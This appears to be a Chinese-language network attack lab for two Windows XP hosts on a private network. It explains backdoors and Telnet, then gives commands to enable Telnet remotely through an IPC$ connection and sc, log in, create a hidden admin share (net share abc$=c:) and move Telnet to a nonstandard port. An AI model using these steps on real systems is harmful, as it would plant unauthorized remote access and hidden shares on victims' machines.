實驗簡介

此實驗屬於網路攻防工具系列

實驗目的

1、掌握Telnet服務的原理；

2、掌握Telnet服務的工作過程。

實驗環境

主機A：winxp IP地址：10.1.1.51

主機B：winxp IP地址：10.1.1.119

預備知識

後門是攻擊者在入侵了計算機以後為了以後能方便的進入該計算機而進行的系統設定或安裝的一類軟體，一般是指那些繞過安全性控制而獲取對程式或系統訪問權的程式或方法，要求有很強的隱蔽性。其用途在於潛伏在電腦中，從事蒐集資訊或便於黑客進入的動作，它是一種登入系統的方法，不僅繞過系統已有的安全設定，而且還能挫敗系統上各種增強的安全設定。簡單的後門可能只是建立一個新的賬號，或者接管一個很少使用的賬號；複雜的後門利用系統服務或其他工具，可能會繞過系統的安全認證而對系統有安全存取權。

該實驗主要針對如何開啟Telnet服務。

Telnet協議是Internet遠端登入服務的標準協議和主要方式。它為使用者提供了在本地計算機上完成遠端主機工作的能力。在終端使用者的電腦上使用Telnet程式，用它連線到伺服器。終端使用者可以在Telnet程式中輸入命令，這些命令會在伺服器上執行，就像直接在伺服器的控制檯上輸入一樣。可以在本地就能控制伺服器。要開始一個Telnet會話，必須輸入使用者名稱和密碼來登入伺服器。Telnet是常用的遠端控制Web伺服器的方法。

實驗步驟一：

本地開啟Telnet服務

進入主機A，右鍵“我的電腦”->管理->服務和應用程式->服務，找到Telnet服務，

將啟動型別改為手動

進行啟動

實驗步驟二：遠端開啟Telnet服務

在主機B的“控制面板-工具-資料夾選項-檢視-簡單的檔案共享”去掉選取。

右鍵“我的電腦”->管理->服務和應用程式->服務，找到Telnet服務，關閉之：

回到主機A用net use命令建立ipc$連線 命令：net use \\10.1.1.119\ipc$ "主機B的密碼" /user:administrator

用sc命令把禁用的telnet服務變成自動 命令：sc \\10.1.1.119 config tlntsvr start= auto

在主機B上可以檢視telnet的啟動型別已經變為自動：

用sc命令將telnet啟動

命令：sc \\10.1.1.119 start tlntsvr 在主機B上可以檢視telnet服務已經啟動：

新建一個cmd環境進行telnet登入：telnet 10.1.1.119

telnet連線建立之後，可輸入使用者名稱密碼等相關資訊進行登入，telnet服務登入到遠端主機：

登入後便可進行共享等相關操作，net share建立c$共享 命令：et share abc$=c:

檢視共享目錄：net share

遠端更改telnet埠

輸入tlntadmn \\10.1.1.119 config port=1000 -u administrator -p 主機B的密碼